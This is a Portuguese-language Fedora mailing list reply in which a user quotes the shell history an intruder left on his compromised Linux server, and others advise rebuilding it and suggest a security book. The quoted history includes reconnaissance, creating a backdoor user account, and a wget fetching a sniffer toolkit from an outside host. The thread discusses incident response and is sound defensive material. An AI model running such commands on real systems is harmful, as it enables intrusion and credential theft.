Olha! Da uma olhada no livro BS7799 Da Tatica a aplicacao em Servidores Linux... Procura na siciliano... bem interessante para questao de seguranca...<br><br><div><span class="gmail_quote">Em 27/03/07, <b class="gmail_sendername">
André Felício</b> <<a href="mailto:andre@felicio.com.br">andre@felicio.com.br</a>> escreveu:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Rau,<br><br>A Monday 26 March 2007 15:39:25, Alexandre Singulani escreveu:<br>> o arquivo ta aqui sim, ele não apagou..... mas pelo jeito ele não conseguiu<br>> fazer muita coisa, assim espero....<br>> abaixo os comandos que ele executou
<br>><br>> w<br>> uname -a<br>> cat /proc/cpuinfo<br>> ps x<br>> ps aux<br>> history<br>> group<br>> groups<br>> adduser<br>> adduser baxter<br>> passwd baxter<br>> wget <a href="http://apocalipsa.org/.apocalipsa/sniff.tar">
apocalipsa.org/.apocalipsa/sniff.tar</a><br>> tar xvf sniff.tar<br>> cd sniff<br>> l<br>> l<br>> ls<br>> cd snif<br>> ls<br>> cat klogd1<br>> ls<br>> pico klogd1<br>> nano klogd1<br>> nano clean
<br>> nano cleanssh<br>> nano dnsquery<br>> nano dnsquery<br>> nano dsniff.services<br>> nano inst<br>> nano klogd1<br>> nano libdb.so.3<br>> nano popauth<br>> nano zum<br>> nano <a href="http://named.sn">
named.sn</a><br><br>Bem, seu servidor foi comprometido e a pessoa que fez isso não é lá muito<br>inteligente! (burrinho...)<br><br>Na duvida, eu tiraria ele de produção só por garantia e montaria um outro.<br><br>--<br>Att,
<br><br>André Felício<br><a href="http://www.felicio.com.br">http://www.felicio.com.br</a><br><br> Hmm... Which would do a better job at driving physicists crazy? Travel faster<br>than light, or a floating-point boolean value? -- Michael Mol
<br><br>--<br>Fedora-users-br mailing list<br><a href="mailto:Fedora-users-br@redhat.com">Fedora-users-br@redhat.com</a><br><a href="https://www.redhat.com/mailman/listinfo/fedora-users-br">https://www.redhat.com/mailman/listinfo/fedora-users-br
</a><br><br><br></blockquote></div><br><br clear="all"><br>-- <br>Rafael Brito Gomes<br>Sistema de Informação<br>Universidade de Salvador (UNIFACS)<br><br>Linux User - 430086<br><br>O Tabareu - A Arte em sua forma mais Pura!
<br><a href="http://tabareu.wordpress.com/">http://tabareu.wordpress.com/</a><br><br>Blog TechFree<br><a href="http://techfree.wordpress.com/">http://techfree.wordpress.com/</a>